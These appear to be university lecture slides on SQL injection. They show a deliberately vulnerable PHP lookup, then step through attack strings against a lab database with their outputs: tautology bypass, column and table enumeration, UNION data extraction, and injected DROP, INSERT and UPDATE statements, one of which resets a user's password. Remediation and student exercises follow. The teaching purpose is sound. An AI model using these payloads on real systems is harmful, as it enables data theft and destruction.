

SQL INJECTION



AGENDA

- What is an SQL Injection vulnerability
- An example of SQL Injection
- An analysis of how it works
- How the attacker views the situation
- Input validation
- More attack vectors
- More remediation
- Avoiding SQL Injection

- First, there is a software defect
- That defect results in a security vulnerability (or just vulnerability)
- A vulnerability is a weakness for certain types of attacks on the security of the application
- One of the possible attack types is an SQL Injection
- So, if you have a vulnerability that permits SQL Injection attacks, you have an SQL Injection vulnerability
- Why are we talking about this before we know more about security?

- SQL is "Structured Query Language"
- It is a standardized language for accessing databases
- Examples
 - select name from employee where ssn='123456789'
 - select name, ssn, dob from employee where ssn='123456789' and id='31042'
 - select code,name from products where code = '536' union select code,name from sales where code > '500'
- Every programming language implements SQL functionality in its own way

Accounts				
Name	Account	UserId	Password	
Joe B	1234	joe	mypass	
Tom M	6787	Daisy	rover	
Alicia G	2547	alicia	x123y	
Sally B	7744	sal	yllas	

Balances				
Account	Name	Cbalance	SBalance	
2547	Alicia G	23.45	75.00	
1234	Joe B	67.84	0.00	
3333	Justin D	55.10	200.56	
6787	Tom M	99.21	71.55	
7744	Sally B	17.20	0.00	
8899	Tom Q	102.55	66.00	

Assume that the select statement implemented is:

res = select CBalance from Balances where Acct='\$acct'

- \$acct is the variable containing the account number input by the user (PHP style naming)
- This is a typical usage of a select statement to look up a value

Enter your account number 3215

Your balance

Results in:

res = select CBalance from Balances where Acct='3215'

But what if the user enters something like this

Enter your account number

9999'%20or%20'1'='1

Your balance

res = select CBalance from Balances where Acct='9999' or '1'='1'

- Since '1'='1' is always true, the select statement will return all records
- res will contain, depending on the language
 - every record
 - the first record
 - the last record

• If the code block is:

res = select CBalance from Balances where Acct='\$acct' if res
PrintHTML (res)

• Then the application will print whatever is in res.

• The attacker will have valuable information for further attacks, such as issuing a transaction against the account number discovered

An Example Program

- Command line form
 - http://www.cs.montana.edu/courses/csci476/code/sqli_ex1_mysql.py
 - http://www.cs.montana.edu/courses/csci476/code/sqli_ex1_outputWeb_form
 - http://www.cs.montana.edu/courses/csci476/code/sqli_form.html
 - http://www.cs.montana.edu/courses/csci476/code/sqli_submit.php

```
<?php
# Simple PHP submit handler for mysqli
$acct = $_GET['account'];
$con = mysqli_connect ("127.0.0.1", "cs476", "passw", "cs476_ex1");
if (mysqli_connect_errno ())
 echo "Failed to connect to db: ".mysqli_connect_error();
 exit();
$result = $con->query ($query);
if ($result)
 print ("You are identified as <P> name userid<P> \n");
 while ($row = $result->fetch row())
   printf ("%s | %s <P>", $row[0], $row[1]);
 $result->close ();
$con->close();
?>
```

The Attack String

- How does the attacker determine the attack string?
 - Awareness of how the code might look
 - Guessing
 - Looking at messages resulting from failed attempts

• Using the example program, what happens when you try different strings

1234

You are identified as name userid

Joe B | joe

1234'

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near "1234" at line 1

• Using the example program, what happens when you try different strings

1234' or '1'='1

You are identified as name userid

Joe B | joe

Alica G | alicia

Tom M | Daisy

1234' --

Same as 1234

Some Attack Strings

• Can we guess some field names?

1234' and account=NULL; -- -

For mysql, there must be white space after —

You are identified as name userid

We know account is a valid field name, because

1234' and acct=NULL; --

Unknown column 'acct' in 'where clause'

Gives a different message

Some Attack Strings

• Can we guess some field names?

1234' and userid=NULL; --

You are identified as name userid

Now we know userid

1234' and password=NULL; --

You are identified as name userid

and password; these will be useful

How about table names

1234' and 1=(select count(*) from users); --

Table 'cs476_ex1.users' doesn't exist

We know there's not table named users, but the DB is named cs476_ex1

1234' and 1=(select count(*) from accounts); --

You are identified as name userid'

Bingo!!

How about userid's

1234' or name LIKE '%Tom%'; --

You are identified as name userid
Joe B | joe
Tom M | Daisy

1234' or userid LIKE '%al%'; --

You are identified as name userid
Joe B | joe
Alica G | alicia
Sally B | sal

• DROP TABLE table_name - Now that's just mean

1234'; DROP TABLE TOSSIT; --

You are identified as name userid

Fatal error: Call to a member function fetch_row() on a non-object in /home/www/cs476/sqli/submit.php on line 27

- The error is from the attempt to process an empty result. The DROP was successful.

• INSERT INTO table (fieldlist) VALUES (valuelist)

1234'; INSERT INTO accounts (; --

You are identified as name userid

Fatal error: Call to a member function fetch_row() on a non-object in /home/www/cs476/sqli/submit.php on line 27

- The error is from the attempt to process an empty result. The INSERT was successful.

UPDATE table set expression WHERE expression

11'; UPDATE accounts SET password='fake' WHERE userid='sal'; --

You are identified as name userid

Fatal error: Call to a member function fetch_row() on a non-object in /home/www/cs476/sqli/submit.php on line 27

- The error is from the attempt to process an empty result. The UPDATE was successful.

select cols from table1 ... UNION select cols from table2

1234' union select account, chalance from balances; --

You are identified as name userid
Joe B | joe
1234 | 67.84
2547 | 23.45
3333 | 55.10
6787 | 99.21
7744 | 17.20
8899 | 102.55

- The number of columns must be the same
- The columns from balances are not correctly labeled

select cols from table1 ... UNION ALL select cols from table2

1234' union ALL select account, chalance from balances; --

- No good example, but
- select name, account from accounts union select name, account from balances;
- select name, account from accounts union ALL select name, account from balances;

```
name
             account
| Joe B
             1234
| Alica G
| Tom M
| Sally B
| A Ttacker
              9990
| A Ttacker
              9997
              9998
| A Ttacker
              9999
| A Ttacker
| Alicia G
              3333
 Justin D
 Tom Q
```

1	1
name	account
+	
Justin D	3333
Tom M Sally B Tom Q	6787 7744 8899
+	++

Using union to determine the number of columns

1234' or 1=1 union select null, null from balances; --

You are identified as name userid
Joe B | joe
Alica G | alicia
Tom M | Daisy
Sally B | sal
A Ttacker | me

1234' or 1=1 union select null from balances; --

The used SELECT statements have a different number of columns

Using union to determine the number of columns

1234' or 1=1 union select null, null from balances; --

You are identified as name userid
Joe B | joe
Alica G | alicia
Tom M | Daisy
Sally B | sal
A Ttacker | me

1234' or 1=1 union select null from balances; --

The used SELECT statements have a different number of columns

• ORDER BY - can help identify column names and numbers of columns

1234' ORDER BY 1 --

You are identified as name userid
Joe B | joe

Same for 2, but

1234' ORDER BY 3 --

Unknown column '3' in 'order clause'

We know that the select is for two columns

• ORDER BY - can help identify column names and numbers of columns

1234' ORDER BY name --

You are identified as name userid
Joe B | joe

- But

1234' ORDER BY first_name --

Unknown column 'first_name' in 'order clause'

What Else

- There are dozens of potential attack string types. Check out these refs:
 - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
 - http://www.unixwiz.net/techtips/sql-injection.html
 - http://ha.ckers.org/sqlinjection/
 has a cool place to test strings
 - https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OWASP-DV-005%29

Remediation

- How do you prevent SQL Injection
 - Input validation
 - Using prepared statements
 - Stored procedures
 - Escape special characters
 - All of these, or at least more than one

Input validation

- Blacklisting
 - Make a list of all of the incorrect possibilities and search for them
- Whitelisting
 - Make a list of all the correct possibilities and search for them
 - Much smaller set
 - Regular expression are very help
- Process
 - o Correct length?
 - Correct type (depends on the language)
 - Correct value



Example

```
$zip = $_GET ['zipcode'];
if ((is_array ($zip)) || (! is_string ($zip))
{
    error ("Incorrect zip code format");
    exit ();
}
if ((strlen ($zip) < 5) || (strlen 9$zip) > 12))
    # error condition

$zip_re = '/^\d{5}([-\s]\d{4})?$/'  # 5digits followed by 0 or 1 reps of - or space and 4 digits
if (! preg_match ($zip_re, $zip))  # 1 = match, 0 = no match
    # error condition
```

- - This is a lot of work, so plan for it
 - Create centralized routines to handle input validation
 - You can create data classes that can be tested identically except for the r.e.
 - If you think this is difficult and time-consuming, wait until you have to track down a
 defect

Remediation – Prepared Statements

- They vary between languages
- The give the SQL Engine the query in the form of a string with placeholders and a list of values
- The SQL Engine can use it's knowledge of column types and meta characters to defang the query
 - It's not perfect, so don't depend on it

Python

```
con.execute("select COUNT(*) from tbl1 where r = %s and c = %s", (range, cond))
```

PHP

```
$stmt = $con->prepare("SELECT * from registry where name = ?");
$stmt->execute(array ($name))
```

```
$stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (?, ?)");
$stmt->bindParam(1, $name);
$stmt->bindParam(2, $value);
$name = $_GET ('fname');
$value = $_GET ('fval');
$stmt->execute ();
```

Java

```
PreparedStatement getSales = null;
String getPSstring = "select name, value from tbl1 where cond=? and status=?";
try
  getSales = con.PrepareStatement (getPSstring);
  getSales.setInt (1, condition);
  getSales.setString (2, cur_stat);
  con.commit();
catch (SQLException e)
   System.err.print ("Dagnabbit – no did work");
   System.exit ();
finally { con.close ()}
```

• Left to the consumer Introduction

- Although SQL has some standard special characters, each DB has some of its own, so be careful
- Normally, don't allow special characters in your inputs unless necessary
- In general, Characters preceded by a backslash (\) are escaped
- Some characters have other forms as well e.g. two single quotes means a quote without special meaning
- \0 An ASCII NUL (0x00) character.
 - ' A single quote ("'") character.
 - " A double quote (""") character.
 - \b A backspace character.
 - \n A newline (linefeed) character.
 - \r A carriage return character.
 - \t A tab character.
 - \Z ASCII 26 (Control-Z).

- A backslash ("\") character.
- % A "%" character.
- _ An "_" character.

Remediation – Escaping

- Language specific functions like mysql_real_escape_string are being deprecated because there is too much risk in assuming that escaping will work without other help.
- Look for replace/translate/substitute functionality
 - python

Remediation – Play It Safe

- At least, input validation and prepared statements.
- Input validation has far more uses than just mitigating SQLi

- Where are the vulnerabilities?
 - It must be something that will be used in a DB request
 - Credentials
 - Personal data that might be stored
 - Configuration of the app
 - Things that you create (discussion groups, posts, ...)
 - But probably not
 - Look for entry points places where the application opens itself to the world

- Check for a defect
 - Something simple like a single quote
 - Ramp it up looking for a useful error message indicating a vulnerability
 - If nothing is apparent, try fuzzing the input with a tool
- To get the maximum gain, manually try strings to collect information

- I'm not going to go over everything that pertains to an assignment.
 - You are close to being professionals, you should be able to deduce what you need to know and go find it
 - The clock is ticking
 - I'm not getting any younger. (I don't know what that has to do with it.)
- Due dates
 - Normally, I will ask you to do something you can do in an hour or less and I would expect
 it done by the next class time so I can pile on some more
 - If it's going to take longer, I might mention that
 - If it's going to require some references you might not know about, I will mention those

• Lesson 1

- Create a MySQL database with two tables
 - Table 1 has userid (varchar 10), firstname (varchar 20), lastname (varchar 20), ssn (no dashes) and history (varchar 2000)
 - Table 2 has userid (varchar 10), username (varchar 20), pass (varchar 40), sessionid (varchar 12)
- Then write a routine in Java, Python, PHP or any other language you choose that will get some user input and lookup something in the database given the username and password
 - o e.g. Enter the username and password, and return the userid, or the userid and the name
- I'm not fussy about this. If you do it wrong, you can redo it. This doesn't have to be fancy, commented, indented (except Python) or a work of art. It's proof of concept code. I would prefer it not be all that good because I want it to break.

- You can see where this is headed. Feel free to experiment.
- Do some experimenting, try some different things.
- There are hundreds of examples of SQL Injection strings on the web and some very good sites for study. Try
 - http://www.unixwiz.net/techtips/sql-injection.html
- Update your program to protect against SQL Injection and test that it works.

- Write a simple program with your language of choice that will use regular expressions to check for:
 - SSN's entered in free form (the HTML form doesn't do anything for you)
 - International telephone numbers (not all of them, just a few forms)
 - Last names, where quotes and hyphens are allowed
 - IPv4 IP addresses (how many ways are there? do a few)
 - Id numbers with 3 digits, a dash, two alphanumeric characters, a dash, then either a string of 6 digits, or a string of up to 8 alphabetic characters (upper or lower case), then a period, then 4 hex digits another period and then an optional two digit code.
- Due: 2/6